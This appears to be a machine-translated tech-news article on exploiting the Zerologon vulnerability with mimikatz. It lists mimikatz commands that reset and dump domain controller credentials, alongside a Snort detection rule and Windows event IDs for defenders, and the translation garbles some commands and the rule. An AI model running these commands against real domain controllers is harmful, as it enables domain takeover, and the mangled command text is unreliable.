Shulou(Shulou.com)06/02 Report--

This article mainly explains "mimikatz how to use zerologon to attack domain control server". Interested friends may wish to have a look. The method introduced in this paper is simple, fast and practical. Let's let the editor take you to learn "how mimikatz uses zerologon to attack domain control servers".

Preface of 0x01

Mimikatz version 20200918 supports exploiting domain control servers through zerologon vulnerabilities. Download the link as follows: https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200918-fix

The official screenshot is as follows

The mimikatz related command lsadump::zerologon / target:dc.hacke.testlab / account:dc$poclsadump::zerologon / target:dc.hacke.testlab / account:dc$ / exploit recovers the password by exploiting the zerologon vulnerability on the domain control server lsadump::dcsynclsadump::postzerologon / target:conttosson.locl / account:dc$ #

Snort detection rules

Alert tcp any any-> any! [139445] (msg: "Possible Mimikatz Zerologon Attempt"; flow:established,to_server; content: "| 00 |"; offset:2; content: "| 0f 00 |"; distance:22; within:2; fast_pattern; content: "| 00 00 00 ff ff 2f 21 |"; within:90; reference:url, https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200916; classtype:attempted-admin; sid:20166330; rev:2 Metadata:created_at 2020 / 0919;)

Pcap package

The zerologon vulnerability is used to attack domain-controlled data packets, which makes it convenient for students to write rules and test the pcap github download address.

Windows event Manager self-check

For unpatched domain controls, check out the windows event manager where eventid is 4742 or 4624, 5805

In the windows August update, the new event ID 5829, 5827, 5828, 5830, 5831. The blue team can focus on these events ID to facilitate self-inspection.

Event ID 5829 is generated when vulnerable Netlogon secure channel connections are allowed during the initial deployment phase. Administrators can monitor events ID 5827 and 5828, which trigger 5830 ID when vulnerable Netlogon connections are denied if the "Domain Controller: allow vulnerable Netlogon secure Channel connections" group policy allows connections.

After a successful zerologon attack by mimikatz, an event id of 4648 will be left.

At this point, I believe you have a deeper understanding of "how mimikatz uses zerologon to attack domain control servers". You might as well do it in practice. Here is the website, more related content can enter the relevant channels to inquire, follow us, continue to learn!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.